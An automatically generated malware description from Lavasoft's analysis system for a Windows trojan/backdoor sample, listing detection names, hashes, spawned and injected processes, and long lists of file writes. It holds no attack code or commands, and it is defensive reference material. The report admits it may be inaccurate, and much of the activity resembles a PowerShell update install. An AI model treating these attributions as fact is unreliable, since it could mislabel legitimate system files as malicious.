Trojan.GenericKD.2467243_dc233922ed

by malwarelabrobot on August 11th, 2015 in Malware Descriptions.

Trojan.Win32.Inject.uwzi (Kaspersky), Trojan.GenericKD.2467243 (B) (Emsisoft), Trojan.GenericKD.2467243 (AdAware), Backdoor.Win32.Farfli.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: dc233922edc1fda992c240db2c2d7a02
SHA1: 69483bcbf18d2beca6afa626fb34d0125c11c828
SHA256: 221d1132d2581d10b5be7d71cf1ebc4ccae96d9ce5462ad3bd08c970fc629128
SSDeep: 12288:cHbLHkVSC7RLXZs YslKckhyyqFYFgjsrsbfy:oQj1VsolKJXxx
Size: 422440 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-04 01:38:51
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1812
mofcomp.exe:2148
WindowsXP-KB968930-x86-ENG.exe:1332
ngen.exe:2448
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:1068
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2472
PSCustomSetupUtil.exe:668
PSCustomSetupUtil.exe:3252
PSCustomSetupUtil.exe:3680
PSCustomSetupUtil.exe:1604
PSCustomSetupUtil.exe:3572
PSCustomSetupUtil.exe:1456
PSCustomSetupUtil.exe:3972
PSCustomSetupUtil.exe:4020
PSCustomSetupUtil.exe:2352
PSCustomSetupUtil.exe:2008
PSCustomSetupUtil.exe:3732
PSCustomSetupUtil.exe:1504
PSCustomSetupUtil.exe:2104
wsmanhttpconfig.exe:1520
wsmanhttpconfig.exe:1936

The Trojan injects its code into the following process(es):

update.exe:2168
mscorsvw.exe:2508
svchost.exe:1152
svchost.exe:896
svchost.exe:472

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mofcomp.exe:2148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1068 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\82e7796e90bb69dd8d50b4\about_objects.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.wsman.runtime.dll (33 bytes)
C:\82e7796e90bb69dd8d50b4\about_comparison_operators.help.txt (11 bytes)
C:\82e7796e90bb69dd8d50b4\winrmprov.mof (789 bytes)
C:\82e7796e90bb69dd8d50b4\about_pipelines.help.txt (411 bytes)
C:\82e7796e90bb69dd8d50b4\system.management.automation.resources.dll (3153 bytes)
C:\82e7796e90bb69dd8d50b4\windowspowershellhelp.chm (26041 bytes)
C:\82e7796e90bb69dd8d50b4\about_preference_variables.help.txt (37 bytes)
C:\82e7796e90bb69dd8d50b4\about_environment_variables.help.txt (417 bytes)
C:\82e7796e90bb69dd8d50b4\about_windows_powershell_ise.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\about_variables.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\about_join.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\update\eula.txt (586 bytes)
C:\82e7796e90bb69dd8d50b4\about_automatic_variables.help.txt (14 bytes)
C:\82e7796e90bb69dd8d50b4\about_foreach.help.txt (10 bytes)
C:\82e7796e90bb69dd8d50b4\wtrinstaller.ico (4803 bytes)
C:\82e7796e90bb69dd8d50b4\about_pssession_details.help.txt (9 bytes)
C:\82e7796e90bb69dd8d50b4\about_arithmetic_operators.help.txt (168 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\82e7796e90bb69dd8d50b4\about_requires.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\about_arrays.help.txt (8 bytes)
C:\82e7796e90bb69dd8d50b4\update\updspapi.dll (5940 bytes)
C:\82e7796e90bb69dd8d50b4\about_execution_policies.help.txt (13 bytes)
C:\82e7796e90bb69dd8d50b4\about_pssessions.help.txt (9 bytes)
C:\82e7796e90bb69dd8d50b4\powershell.exe (7339 bytes)
C:\82e7796e90bb69dd8d50b4\about_command_syntax.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\about_functions_advanced_parameters.help.txt (962 bytes)
C:\82e7796e90bb69dd8d50b4\filesystem.format.ps1xml (133 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\82e7796e90bb69dd8d50b4\pwrshplugin.dll (802 bytes)
C:\82e7796e90bb69dd8d50b4\winrmprov.dll (591 bytes)
C:\82e7796e90bb69dd8d50b4\about_ws-management_cmdlets.help.txt (405 bytes)
C:\82e7796e90bb69dd8d50b4\about_wildcards.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\about_scripts.help.txt (12 bytes)
C:\82e7796e90bb69dd8d50b4\about_hash_tables.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\winrm.cmd (35 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote_troubleshooting.help.txt (146 bytes)
C:\82e7796e90bb69dd8d50b4\about_reserved_words.help.txt (1 bytes)
C:\82e7796e90bb69dd8d50b4\about_functions.help.txt (586 bytes)
C:\82e7796e90bb69dd8d50b4\wsmpty.xsl (1 bytes)
C:\82e7796e90bb69dd8d50b4\about_command_precedence.help.txt (8 bytes)
C:\82e7796e90bb69dd8d50b4\about_regular_expressions.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\82e7796e90bb69dd8d50b4\about_trap.help.txt (10 bytes)
C:\82e7796e90bb69dd8d50b4\about_for.help.txt (146 bytes)
C:\82e7796e90bb69dd8d50b4\windowsremoteshell.adm (12 bytes)
C:\82e7796e90bb69dd8d50b4\$shtdwn$.req (788 bytes)
C:\82e7796e90bb69dd8d50b4\wsmauto.mof (4 bytes)
C:\82e7796e90bb69dd8d50b4\wevtfwd.dll (3351 bytes)
C:\82e7796e90bb69dd8d50b4\about_while.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\82e7796e90bb69dd8d50b4\about_special_characters.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\wsmtxt.xsl (2 bytes)
C:\82e7796e90bb69dd8d50b4\about_commonparameters.help.txt (12 bytes)
C:\82e7796e90bb69dd8d50b4\eventforwarding.adm (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.dll (3118 bytes)
C:\82e7796e90bb69dd8d50b4\spmsg.dll (495 bytes)
C:\82e7796e90bb69dd8d50b4\types.ps1xml (2510 bytes)
C:\82e7796e90bb69dd8d50b4\about_if.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\about_parameters.help.txt (9 bytes)
C:\82e7796e90bb69dd8d50b4\update\update.exe (10748 bytes)
C:\82e7796e90bb69dd8d50b4\winrsmgr.dll (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\82e7796e90bb69dd8d50b4\about_redirection.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\pssetupnativeutils.exe (9 bytes)
C:\82e7796e90bb69dd8d50b4\about_split.help.txt (10 bytes)
C:\82e7796e90bb69dd8d50b4\update\update.inf (2457 bytes)
C:\82e7796e90bb69dd8d50b4\about_script_blocks.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\system.management.automation.dll (38414 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.resources.dll (9 bytes)
C:\82e7796e90bb69dd8d50b4\winrshost.exe (22 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote_jobs.help.txt (13 bytes)
C:\82e7796e90bb69dd8d50b4\about_switch.help.txt (489 bytes)
C:\82e7796e90bb69dd8d50b4\winrm.ini (1956 bytes)
C:\82e7796e90bb69dd8d50b4\about_path_syntax.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\about_data_sections.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\about_core_commands.help.txt (221 bytes)
C:\82e7796e90bb69dd8d50b4\about_debuggers.help.txt (21 bytes)
C:\82e7796e90bb69dd8d50b4\about_continue.help.txt (1 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\82e7796e90bb69dd8d50b4\about_profiles.help.txt (457 bytes)
C:\82e7796e90bb69dd8d50b4\about_providers.help.txt (59 bytes)
C:\82e7796e90bb69dd8d50b4\powershell_ise.resources.dll (4 bytes)
C:\82e7796e90bb69dd8d50b4\powershell_ise.exe (2526 bytes)
C:\82e7796e90bb69dd8d50b4\about_prompts.help.txt (7 bytes)
C:\82e7796e90bb69dd8d50b4\about_try_catch_finally.help.txt (7 bytes)
C:\82e7796e90bb69dd8d50b4\diagnostics.format.ps1xml (590 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote_faq.help.txt (775 bytes)
C:\82e7796e90bb69dd8d50b4\bitstransfer.psd1 (950 bytes)
C:\82e7796e90bb69dd8d50b4\about_return.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\82e7796e90bb69dd8d50b4\about_line_editing.help.txt (1 bytes)
C:\82e7796e90bb69dd8d50b4\about_types.ps1xml.help.txt (481 bytes)
C:\82e7796e90bb69dd8d50b4\about_functions_advanced_methods.help.txt (9 bytes)
C:\82e7796e90bb69dd8d50b4\about_locations.help.txt (794 bytes)
C:\82e7796e90bb69dd8d50b4\spuninst.exe (3787 bytes)
C:\82e7796e90bb69dd8d50b4\default.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\82e7796e90bb69dd8d50b4\winrssrv.dll (12 bytes)
C:\82e7796e90bb69dd8d50b4\about_wmi_cmdlets.help.txt (8 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.dll (5010 bytes)
C:\82e7796e90bb69dd8d50b4\wsmanhttpconfig.exe (3009 bytes)
C:\82e7796e90bb69dd8d50b4\importallmodules.psd1 (438 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\82e7796e90bb69dd8d50b4\about_aliases.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\powershellcore.format.ps1xml (1492 bytes)
C:\82e7796e90bb69dd8d50b4\about_job_details.help.txt (824 bytes)
C:\82e7796e90bb69dd8d50b4\about_language_keywords.help.txt (11 bytes)
C:\82e7796e90bb69dd8d50b4\wsmauto.dll (1842 bytes)
C:\82e7796e90bb69dd8d50b4\system.management.automation.dll-help.xml (16567 bytes)
C:\82e7796e90bb69dd8d50b4\about_type_operators.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\update\kb968930xp.cat (512 bytes)
C:\82e7796e90bb69dd8d50b4\about_functions_advanced.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.dll (14450 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.management.dll (3386 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\82e7796e90bb69dd8d50b4\about_do.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.security.dll (1145 bytes)
C:\82e7796e90bb69dd8d50b4\wsman.format.ps1xml (837 bytes)
C:\82e7796e90bb69dd8d50b4\about_ref.help.txt (1 bytes)
C:\82e7796e90bb69dd8d50b4\about_throw.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\wsmplpxy.dll (603 bytes)
C:\82e7796e90bb69dd8d50b4\about_session_configurations.help.txt (276 bytes)
C:\82e7796e90bb69dd8d50b4\about_format.ps1xml.help.txt (17 bytes)
C:\82e7796e90bb69dd8d50b4\about_escape_characters.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\profile.ps1 (772 bytes)
C:\82e7796e90bb69dd8d50b4\winrs.exe (1154 bytes)
C:\82e7796e90bb69dd8d50b4\powershelltrace.format.ps1xml (344 bytes)
C:\82e7796e90bb69dd8d50b4\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\pwrshmsg.dll (4 bytes)
C:\82e7796e90bb69dd8d50b4\certificate.format.ps1xml (155 bytes)
C:\82e7796e90bb69dd8d50b4\about_assignment_operators.help.txt (379 bytes)
C:\82e7796e90bb69dd8d50b4\update\spcustom.dll (23 bytes)
C:\82e7796e90bb69dd8d50b4\about_modules.help.txt (13 bytes)
C:\82e7796e90bb69dd8d50b4\about_methods.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\wsmsvc.dll (15909 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\82e7796e90bb69dd8d50b4\pspluginwkr.dll (1756 bytes)
C:\82e7796e90bb69dd8d50b4\wsmres.dll (6164 bytes)
C:\82e7796e90bb69dd8d50b4\winrscmd.dll (2907 bytes)
C:\82e7796e90bb69dd8d50b4\about_signing.help.txt (12 bytes)
C:\82e7796e90bb69dd8d50b4\pwrshsip.dll (24 bytes)
C:\82e7796e90bb69dd8d50b4\help.format.ps1xml (3947 bytes)
C:\82e7796e90bb69dd8d50b4\wsmprovhost.exe (657 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.editor.resources.dll (562 bytes)
C:\82e7796e90bb69dd8d50b4\about_bits_cmdlets.help.txt (7 bytes)
C:\82e7796e90bb69dd8d50b4\about_scopes.help.txt (76 bytes)
C:\82e7796e90bb69dd8d50b4\about_history.help.txt (3 bytes)
C:\82e7796e90bb69dd8d50b4\about_operators.help.txt (770 bytes)
C:\82e7796e90bb69dd8d50b4\about_parsing.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\about_logical_operators.help.txt (2 bytes)
C:\82e7796e90bb69dd8d50b4\about_break.help.txt (792 bytes)
C:\82e7796e90bb69dd8d50b4\wsmwmipl.dll (2816 bytes)
C:\82e7796e90bb69dd8d50b4\spupdsvc.exe (287 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\82e7796e90bb69dd8d50b4\about_script_internationalization.help.txt (9 bytes)
C:\82e7796e90bb69dd8d50b4\registry.format.ps1xml (20 bytes)
C:\82e7796e90bb69dd8d50b4\powershell.exe.mui (10 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote_output.help.txt (887 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.wsman.management.resources.dll (13 bytes)
C:\82e7796e90bb69dd8d50b4\about_windows_powershell_2.0.help.txt (453 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\82e7796e90bb69dd8d50b4\windowsremotemanagement.adm (574 bytes)
C:\82e7796e90bb69dd8d50b4\about_jobs.help.txt (12 bytes)
C:\82e7796e90bb69dd8d50b4\update\update.ver (14 bytes)
C:\82e7796e90bb69dd8d50b4\bitstransfer.format.ps1xml (16 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\82e7796e90bb69dd8d50b4\about_comment_based_help.help.txt (595 bytes)
C:\82e7796e90bb69dd8d50b4\about_eventlogs.help.txt (5 bytes)
C:\82e7796e90bb69dd8d50b4\getevent.types.ps1xml (15 bytes)
C:\82e7796e90bb69dd8d50b4\about_transactions.help.txt (1011 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\82e7796e90bb69dd8d50b4\about_properties.help.txt (7 bytes)
C:\82e7796e90bb69dd8d50b4\pscustomsetuputil.exe (316 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote_requirements.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\about_pssnapins.help.txt (6 bytes)
C:\82e7796e90bb69dd8d50b4\winrm.vbs (2727 bytes)
C:\82e7796e90bb69dd8d50b4\dotnettypes.format.ps1xml (266 bytes)
C:\82e7796e90bb69dd8d50b4\about_remote.help.txt (7 bytes)
C:\82e7796e90bb69dd8d50b4\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\82e7796e90bb69dd8d50b4\about_quoting_rules.help.txt (659 bytes)

The Trojan deletes the following file(s):

C:\_354453_ (0 bytes)

The process ngen.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (530 bytes)

The process update.exe:2168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%System%\config\SYSTEM.LOG (5305 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (2400 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1579 bytes)
%WinDir%\inf\oem11.PNF (10040 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (205168 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
